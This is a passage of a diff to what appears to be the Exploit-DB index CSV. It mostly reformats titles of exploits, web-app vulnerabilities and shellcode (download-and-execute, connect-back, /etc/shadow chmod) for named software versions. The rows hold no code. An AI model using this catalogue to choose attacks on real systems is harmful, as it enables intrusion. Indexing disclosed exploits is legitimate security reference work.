Execution",2010-04-08,ZSploit.com,multiple,dos,0 12110,platforms/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption Denial of Service",2010-04-08,"Jonathan Salwan",windows,dos,0 12111,platforms/php/webapps/12111.txt,"Joomla! Component Webee Comments - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 @@ -11160,7 +11160,7 @@ id,file,description,date,author,platform,type,port 12207,platforms/windows/dos/12207.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetShareEnum Overwrite (SEH) (PoC)",2010-04-13,s4squatch,windows,dos,0 12208,platforms/windows/dos/12208.html,"MagnetoSoft NetworkResources - ActiveX NetConnectionEnum Overwrite (SEH) (PoC)",2010-04-13,s4squatch,windows,dos,0 12212,platforms/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 - Local File Inclusion",2010-04-14,"cr4wl3r ",php,webapps,0 -12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense Mp110013.sys 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0 +12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0 12217,platforms/multiple/dos/12217.py,"Aircrack-NG Tools svn r1675 - Remote Exploit",2010-04-14,"Lukas Lueg",multiple,dos,0 12218,platforms/asp/webapps/12218.txt,"School Management System Pro 6.0.0 - Backup Dump",2010-04-14,indoushka,asp,webapps,0 12219,platforms/php/webapps/12219.txt,"Mp3 Online Id Tag Editor - Remote File Inclusion",2010-04-14,indoushka,php,webapps,0 @@ -11188,7 +11188,7 @@ id,file,description,date,author,platform,type,port 12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,jsp,webapps,0 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow (PoC)",2010-04-14,mr_me,windows,dos,0 -12244,platforms/windows/remote/12244.txt,"iMesh 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow",2007-12-18,rgod,windows,remote,0 +12244,platforms/windows/remote/12244.txt,"iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow",2007-12-18,rgod,windows,remote,0 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0 12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0 12246,platforms/php/webapps/12246.txt,"Joomla! Component com_iproperty 1.5.3 - 'id' SQL Injection",2010-04-15,v3n0m,php,webapps,0 @@ -11235,14 +11235,14 @@ id,file,description,date,author,platform,type,port 12291,platforms/php/webapps/12291.txt,"Joomla! Component iF surfALERT com_if_surfalert - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 12292,platforms/php/webapps/12292.txt,"Flex File Manager - Arbitrary File Upload",2010-04-19,Mr.MLL,php,webapps,0 12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 -12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX - Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 +12294,platforms/windows/dos/12294.txt,"avtech software 'avc781viewer.dll' ActiveX - Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 12295,platforms/php/webapps/12295.txt,"N/X Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0 12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-19,"cr4wl3r ",php,webapps,0 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Denial of Service / Modem Reset",2010-04-19,hkm,hardware,dos,0 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0 12299,platforms/php/webapps/12299.txt,"Joomla! Component GBU FACEBOOK 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0 12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 - SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0 -12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0 +12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0 12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection",2010-04-20,Ctacok,php,webapps,0 12304,platforms/multiple/remote/12304.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (1)",2010-04-20,chr1x,multiple,remote,0 12305,platforms/php/webapps/12305.txt,"Joomla! Component com_jnewspaper - 'cid' SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0 @@ -11263,7 +11263,7 @@ id,file,description,date,author,platform,type,port 12323,platforms/php/webapps/12323.txt,"wb news (webmobo) 2.3.3 - Persistent Cross-Site Scripting",2010-04-21,ITSecTeam,php,webapps,0 12324,platforms/multiple/dos/12324.py,"Multiple Browsers - Audio Tag Denial of Service",2010-04-21,"Chase Higgins",multiple,dos,0 12325,platforms/php/webapps/12325.txt,"Joomla! Component com_portfolio - Local File Disclosure",2010-04-21,Mr.tro0oqy,php,webapps,0 -12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - zgtips.dll Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 +12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 12329,platforms/asp/webapps/12329.txt,"CactuShop - User Invoices Persistent Cross-Site Scripting",2010-04-21,7Safe,asp,webapps,0 12330,platforms/php/webapps/12330.txt,"Apache OFBiz - Multiple Cross-Site Scripting",2010-04-21,"Lucas Apa",php,webapps,0 12331,platforms/windows/remote/12331.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (2)",2010-04-20,Dr_IDE,windows,remote,0 @@ -11325,7 +11325,7 @@ id,file,description,date,author,platform,type,port 12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup",2010-04-26,indoushka,php,webapps,0 12403,platforms/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow",2010-04-26,Dr_IDE,windows,local,0 12404,platforms/windows/local/12404.py,"IDEAL Migration 2009 4.5.1 - Local Buffer Overflow",2010-04-26,Dr_IDE,windows,local,0 -12406,platforms/windows/local/12406.py,"Avast! 4.7 - aavmker4.sys Privilege Escalation",2010-04-27,ryujin,windows,local,0 +12406,platforms/windows/local/12406.py,"Avast! 4.7 - 'aavmker4.sys' Privilege Escalation",2010-04-27,ryujin,windows,local,0 12407,platforms/php/webapps/12407.txt,"CMScout 2.08 - SQL Injection",2010-04-26,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 12408,platforms/windows/dos/12408.pl,"Safari 4.0.5 - (531.22.7) Denial of Service",2010-04-26,"Xss mAn",windows,dos,0 12410,platforms/php/webapps/12410.txt,"PostNuke 0.764 Module modload - SQL Injection",2010-04-26,BILGE_KAGAN,php,webapps,0 @@ -11335,7 +11335,7 @@ id,file,description,date,author,platform,type,port 12414,platforms/php/webapps/12414.txt,"2DayBiz Auction Script - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12415,platforms/php/webapps/12415.txt,"Infocus Real Estate Enterprise Edition Script - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12416,platforms/php/webapps/12416.txt,"PHP Quick Arcade 3.0.21 - Multiple Vulnerabilities",2010-04-27,ITSecTeam,php,webapps,0 -12417,platforms/windows/remote/12417.py,"Bigant Messenger 2.52 - (AntCore.dll) RegisterCom() Remote Heap Overflow",2010-04-27,mr_me,windows,remote,0 +12417,platforms/windows/remote/12417.py,"Bigant Messenger 2.52 - 'AntCore.dll' RegisterCom() Remote Heap Overflow",2010-04-27,mr_me,windows,remote,0 12419,platforms/php/webapps/12419.txt,"Boutique SudBox 1.2 - Cross-Site Request Forgery (Changer Login et Mot de Passe)",2010-04-27,indoushka,php,webapps,0 12420,platforms/php/webapps/12420.php,"Portaneo Portal 2.2.3 - Arbitrary File Upload",2010-04-27,eidelweiss,php,webapps,0 12421,platforms/php/webapps/12421.txt,"Help Center Live 2.0.6 - (module=helpcenter&file=) Local File Inclusion",2010-04-27,41.w4r10r,php,webapps,0 @@ -11402,7 +11402,7 @@ id,file,description,date,author,platform,type,port 12484,platforms/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL Injection / XPath Injection",2010-05-02,indoushka,php,webapps,0 12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,php,webapps,0 12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-05-02,"cr4wl3r ",php,webapps,0 -12487,platforms/windows/dos/12487.html,"Apple Safari 4.0.5 - JavaScriptCore.dll Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0 +12487,platforms/windows/dos/12487.html,"Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0 12488,platforms/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Inclusion",2010-05-03,"cr4wl3r ",php,webapps,0 12489,platforms/php/webapps/12489.txt,"Joomla! 1.6.0-Alpha2 - Cross-Site Scripting",2010-05-03,mega-itec.com,php,webapps,0 12491,platforms/multiple/dos/12491.html,"All browsers - Crash",2010-05-03,"Inj3ct0r Team",multiple,dos,0 @@ -11470,8 +11470,8 @@ id,file,description,date,author,platform,type,port 12562,platforms/php/webapps/12562.txt,"Waibrasil - Remote File Inclusion / Local File Inclusion",2010-05-10,eXeSoul,php,webapps,0 12563,platforms/php/webapps/12563.txt,"Fiomental & Coolsis Backoffice - Multiple Vulnerabilities",2010-05-10,MasterGipy,php,webapps,0 12564,platforms/windows/dos/12564.txt,"Microsoft Windows Outlook Express and Windows Mail - Integer Overflow",2010-05-11,"Francis Provencher",windows,dos,0 -12565,platforms/php/webapps/12565.txt,"724CMS Enterprise 4.59 - (section.php) Local File Inclusion",2010-05-11,CoBRa_21,php,webapps,0 -12566,platforms/php/webapps/12566.txt,"724CMS Enterprise 4.59 - (section.php) SQL Injection",2010-05-11,CoBRa_21,php,webapps,0 +12565,platforms/php/webapps/12565.txt,"724CMS Enterprise 4.59 - 'section.php' Local File Inclusion",2010-05-11,CoBRa_21,php,webapps,0 +12566,platforms/php/webapps/12566.txt,"724CMS Enterprise 4.59 - 'section.php' SQL Injection",2010-05-11,CoBRa_21,php,webapps,0 12567,platforms/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass",2010-05-11,indoushka,php,webapps,0 12568,platforms/php/webapps/12568.txt,"Digital College 1.0 - Arbitrary File Upload",2010-05-11,indoushka,php,webapps,0 12569,platforms/php/webapps/12569.html,"Fast Free Media 1.3 - Adult Site - Arbitrary File Upload",2010-05-11,indoushka,php,webapps,0 @@ -11485,12 +11485,12 @@ id,file,description,date,author,platform,type,port 12577,platforms/php/webapps/12577.txt,"Marinet CMS - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-11,CoBRa_21,php,webapps,0 12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 - (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0 12579,platforms/php/webapps/12579.txt,"Joomla! Component Custom PHP Pages com_PHP - Local File Inclusion",2010-05-12,"Chip d3 bi0s",php,webapps,0 -12580,platforms/windows/remote/12580.txt,"MiniWebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0 +12580,platforms/windows/remote/12580.txt,"MiniWebsvr 0.0.10 - Directory Traversal / Listing",2010-05-12,Dr_IDE,windows,remote,0 12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0 12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0 12583,platforms/php/webapps/12583.txt,"e-webtech - 'fixed_page.asp' SQL Injection",2010-05-12,FL0RiX,php,webapps,0 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - 'FCKeditor' Arbitrary File Upload",2010-05-12,eidelweiss,php,webapps,0 -12585,platforms/php/webapps/12585.txt,"4Images 1.7.7 - (image_utils.php) Remote Command Execution",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 +12585,platforms/php/webapps/12585.txt,"4Images 1.7.7 - 'image_utils.php' Remote Command Execution",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection",2010-05-13,Cryptovirus,php,webapps,0 12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities",2010-05-13,"fl0 fl0w",linux,remote,21 12588,platforms/linux/dos/12588.txt,"Samba - Multiple Denial of Service Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0 @@ -11560,7 +11560,7 @@ id,file,description,date,author,platform,type,port 12660,platforms/hardware/webapps/12660.txt,"Palo Alto Network Vulnerability - Cross-Site Scripting",2010-05-19,"Jeromie Jackson",hardware,webapps,0 12661,platforms/php/webapps/12661.txt,"DBCart - 'article.php' SQL Injection",2010-05-19,v3n0m,php,webapps,0 12662,platforms/windows/local/12662.rb,"SyncBack Freeware 3.2.20.0 - Exploit",2010-05-19,Lincoln,windows,local,0 -12663,platforms/windows/remote/12663.html,"CommuniCrypt Mail 1.16 - (ANSMTP.dll/AOSMTP.dll) ActiveX",2010-05-19,Lincoln,windows,remote,0 +12663,platforms/windows/remote/12663.html,"CommuniCrypt Mail 1.16 - 'ANSMTP.dll/AOSMTP.dll' ActiveX",2010-05-19,Lincoln,windows,remote,0 12664,platforms/asp/webapps/12664.txt,"Renista CMS - Exploit",2010-05-20,"Amir Afghanian",asp,webapps,0 12665,platforms/php/webapps/12665.pl,"IMEDIA - 'index.php' SQL Injection",2010-05-20,kannibal615,php,webapps,0 12666,platforms/php/webapps/12666.txt,"DB[CMS] - 'article.php' SQL Injection",2010-05-20,blackraptor,php,webapps,0 @@ -11572,7 +11572,7 @@ id,file,description,date,author,platform,type,port 30093,platforms/linux/local/30093.txt,"Mutt 1.4.2 - Mutt_Gecos_Name Function Local Buffer Overflow",2007-05-28,raylai,linux,local,0 14341,platforms/php/webapps/14341.html,"Campsite CMS 3.4.0 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 12676,platforms/php/webapps/12676.txt,"Open-AudIT - Multiple Vulnerabilities",2010-05-21,"Sébastien Duquette",php,webapps,0 -12677,platforms/windows/local/12677.html,"Rumba FTP Client FTPSFtp.dll 4.2.0.0 - OpenSession() Buffer Overflow",2010-05-21,sinn3r,windows,local,0 +12677,platforms/windows/local/12677.html,"Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - OpenSession() Buffer Overflow",2010-05-21,sinn3r,windows,local,0 28046,platforms/php/webapps/28046.txt,"dotWidget for articles 2.0 - admin/editconfig.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 28047,platforms/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Inclusion",2006-06-17,"M.Hasran Addahroni",php,webapps,0 28048,platforms/php/webapps/28048.txt,"RahnemaCo - 'page.php' PageID Remote File Inclusion",2006-06-17,CrAzY.CrAcKeR,php,webapps,0 @@ -11607,7 +11607,7 @@ id,file,description,date,author,platform,type,port 12706,platforms/php/webapps/12706.txt,"MMA Creative Design - SQL Injection",2010-05-23,XroGuE,php,webapps,0 12707,platforms/php/webapps/12707.txt,"runt-communications Design - SQL Injection",2010-05-23,XroGuE,php,webapps,0 12709,platforms/php/webapps/12709.txt,"webperformance eCommerce - SQL Injection",2010-05-23,cyberlog,php,webapps,0 -12710,platforms/windows/local/12710.c,"Kingsoft Webshield KAVSafe.sys 2010.4.14.609 (2010.5.23) - Kernel Mode Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local,0 +12710,platforms/windows/local/12710.c,"Kingsoft Webshield 'KAVSafe.sys' 2010.4.14.609 (2010.5.23) - Kernel Mode Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local,0 12711,platforms/php/webapps/12711.txt,"BBMedia Design's - SQL Injection",2010-05-23,XroGuE,php,webapps,0 12712,platforms/php/webapps/12712.txt,"goffgrafix - Design's - SQL Injection",2010-05-23,XroGuE,php,webapps,0 12713,platforms/php/webapps/12713.txt,"eCreo - SQL Injection",2010-05-23,cyberlog,php,webapps,0 @@ -12001,8 +12001,8 @@ id,file,description,date,author,platform,type,port 13509,platforms/win_x86/shellcode/13509.c,"Win32 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,win_x86,shellcode,0 13510,platforms/win_x86/shellcode/13510.c,"Win32 XP SP2 FR - Sellcode cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,win_x86,shellcode,0 13511,platforms/win_x86/shellcode/13511.c,"Win32/XP SP2 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode,0 -13512,platforms/win_x86/shellcode/13512.c,"Win32 - PEB Kernel32.dll ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 -13513,platforms/win_x86/shellcode/13513.c,"Win32 - PEB Kernel32.dll ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 +13512,platforms/win_x86/shellcode/13512.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 +13513,platforms/win_x86/shellcode/13513.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 13514,platforms/win_x86/shellcode/13514.asm,"Win32 - Connectback_ receive_ save and execute Shellcode",2008-08-25,loco,win_x86,shellcode,0 13515,platforms/win_x86/shellcode/13515.pl,"Win32 - Download and Execute Shellcode (Generator) (Browsers Edition) (275+ bytes)",2008-03-14,"YAG KOHHA",win_x86,shellcode,0 13516,platforms/win_x86/shellcode/13516.asm,"Win32 - Tiny Download and Exec Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode,0 @@ -12359,7 +12359,7 @@ id,file,description,date,author,platform,type,port 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0 14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0 14015,platforms/php/webapps/14015.txt,"2DayBiz Photo Sharing Script - SQL Injection (1)",2010-06-24,JaMbA,php,webapps,0 -14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0 +14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - 'init.php' Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0 14017,platforms/php/webapps/14017.txt,"Joomla! Component com_realtyna - Local File Inclusion",2010-06-24,MISTERFRIBO,php,webapps,0 14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0 14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0 @@ -12418,7 +12418,7 @@ id,file,description,date,author,platform,type,port 14094,platforms/php/webapps/14094.txt,"Netartmedia iBoutique.MALL - SQL Injection",2010-06-28,Sid3^effects,php,webapps,0 14095,platforms/php/webapps/14095.txt,"I-net Multi User Email Script - SQL Injection",2010-06-28,Sid3^effects,php,webapps,0 14096,platforms/php/webapps/14096.html,"CMSQLite / CMySQLite 1.3 - Cross-Site Request Forgery",2010-06-28,"ADEO Security",php,webapps,0 -14295,platforms/windows/dos/14295.html,"Microsoft - MSHTML.dll CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak",2010-07-09,"Ruben Santamarta ",windows,dos,0 +14295,platforms/windows/dos/14295.html,"Microsoft - 'MSHTML.dll' CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak",2010-07-09,"Ruben Santamarta ",windows,dos,0 14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local Buffer Overflow (SEH)",2010-06-28,chap0,windows,local,0 14099,platforms/windows/dos/14099.py,"MemDb - Multiple Remote Denial of Service",2010-06-28,Markot,windows,dos,80 14106,platforms/php/webapps/14106.txt,"PHPDirector 0.30 - (videos.php) SQL Injection",2010-06-29,Mr-AbdoX,php,webapps,0 @@ -12438,7 +12438,7 @@ id,file,description,date,author,platform,type,port 14119,platforms/lin_x86/shellcode/14119.c,"Linux/x86 - Polymorphic /bin/sh Shellcode (116 bytes)",2010-06-29,gunslinger_,lin_x86,shellcode,0 14274,platforms/php/webapps/14274.txt,"Joomla! Component Music Manager - Local File Inclusion",2010-07-08,Sid3^effects,php,webapps,0 14142,platforms/arm/shellcode/14142.c,"Linux/ARM - polymorphic chmod(_/etc/shadow__ 0777) Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",arm,shellcode,0 -14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 - (CoolType.dll) Remote Memory Corruption / Denial of Service",2010-06-29,LiquidWorm,multiple,dos,0 +14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 - 'CoolType.dll' Remote Memory Corruption / Denial of Service",2010-06-29,LiquidWorm,multiple,dos,0 14122,platforms/arm/shellcode/14122.txt,"Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",arm,shellcode,0 14123,platforms/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 14124,platforms/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection",2010-06-30,Dante90,php,webapps,0 @@ -12726,7 +12726,7 @@ id,file,description,date,author,platform,type,port 14482,platforms/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - smi File Buffer Overflow",2010-07-27,"Lufeng Li",windows,local,0 14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote Denial of Service",2010-07-27,"Richard leahy",windows,dos,0 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0 -14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys 1.5.2.755 - Privilege Escalation",2010-07-28,th_decoder,windows,local,0 +14491,platforms/windows/local/14491.txt,"Zemana AntiLogger 'AntiLog32.sys' 1.5.2.755 - Privilege Escalation",2010-07-28,th_decoder,windows,local,0 14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0 14488,platforms/php/webapps/14488.txt,"Joomla! Component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 @@ -12757,7 +12757,7 @@ id,file,description,date,author,platform,type,port 14530,platforms/php/webapps/14530.txt,"Joomla! Component CamelcityDB 2.2 - SQL Injection",2010-08-02,Amine_92,php,webapps,0 14531,platforms/php/webapps/14531.pdf,"MyIT CRM - Multiple Cross-Site Scripting",2010-08-02,"Juan Manuel Garcia",php,webapps,0 14532,platforms/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr - Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",windows,local,0 -14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 - aswFW.sys kernel driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0 +14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 - 'aswFW.sys' Kernel Driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0 14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Inclusion",2010-08-03,eidelweiss,php,webapps,0 14538,platforms/ios/local/14538.txt,"Apple iOS - pdf Jailbreak Exploit",2010-08-03,jailbreakme,ios,local,0 14539,platforms/windows/remote/14539.html,"FathFTP 1.8 - (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0 @@ -12791,7 +12791,7 @@ id,file,description,date,author,platform,type,port 14581,platforms/windows/local/14581.py,"myMP3-Player 3.0 - Buffer Overflow",2010-08-08,"Oh Yaw Theng",windows,local,0 14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec - Denial of Service",2010-08-08,"Nishant Das Patnaik",windows,dos,0 14587,platforms/windows/dos/14587.py,"Visual MP3 Splitter & Joiner 6.1 - Denial of Service",2010-08-09,"Oh Yaw Theng",windows,dos,0 -14584,platforms/windows/dos/14584.py,"QQ Computer Manager - TSKsp.sys Local Denial of Service",2010-08-09,"Lufeng Li",windows,dos,0 +14584,platforms/windows/dos/14584.py,"QQ Computer Manager - 'TSKsp.sys' Local Denial of Service",2010-08-09,"Lufeng Li",windows,dos,0 14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,php,webapps,0 14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - (FileExists) ActiveX Buffer Overflow",2010-08-09,s-dz,windows,remote,0 14598,platforms/php/webapps/14598.txt,"Joomla! Component Teams - Multiple Blind SQL Injection",2010-08-10,"Salvatore Fresta",php,webapps,0 @@ -12831,7 +12831,7 @@ id,file,description,date,author,platform,type,port 14629,platforms/multiple/webapps/14629.html,"Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)",2010-08-12,"KOLTN S",multiple,webapps,80 14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - 'Universal' Buffer Overflow (SEH)",2010-08-12,Dr_IDE,windows,local,0 14633,platforms/windows/local/14633.py,"Xion Player 1.0.125 - Stack Buffer Overflow",2010-08-13,corelanc0d3r,windows,local,0 -14634,platforms/windows/dos/14634.txt,"SmartCode ServerX VNC Server ActiveX 1.1.5.0 - (scvncsrvx.dll) Denial of Service",2010-08-13,LiquidWorm,windows,dos,0 +14634,platforms/windows/dos/14634.txt,"SmartCode ServerX VNC Server ActiveX 1.1.5.0 - 'scvncsrvx.dll' Denial of Service",2010-08-13,LiquidWorm,windows,dos,0 14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - '.m3u' Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0 14658,platforms/windows/remote/14658.txt,"123 FlashChat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote,0 14636,platforms/php/webapps/14636.txt,"Plogger - Remote File Disclosure",2010-08-13,Mr.tro0oqy,php,webapps,0 @@ -12915,13 +12915,13 @@ id,file,description,date,author,platform,type,port 14747,platforms/windows/local/14747.c,"TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0 14737,platforms/php/webapps/14737.txt,"Simple Forum PHP - Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps,0 14739,platforms/windows/local/14739.c,"BS.Player 2.56 build 1043 - 'mfc71loc.dll' DLL Hijacking",2010-08-25,diwr,windows,local,0 -14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 - 'mfc90loc.dll' DLL Hijacking",2010-08-25,diwr,windows,local,0 +14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 - 'mfc90loc.dll' DLL Hijacking",2010-08-25,diwr,windows,local,0 14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking",2010-08-25,storm,windows,local,0 14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0 14743,platforms/windows/local/14743.c,"Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking",2010-08-25,diwr,windows,local,0 14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking",2010-08-25,Dr_IDE,windows,local,0 14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player - 'wintab32.dll' DLL 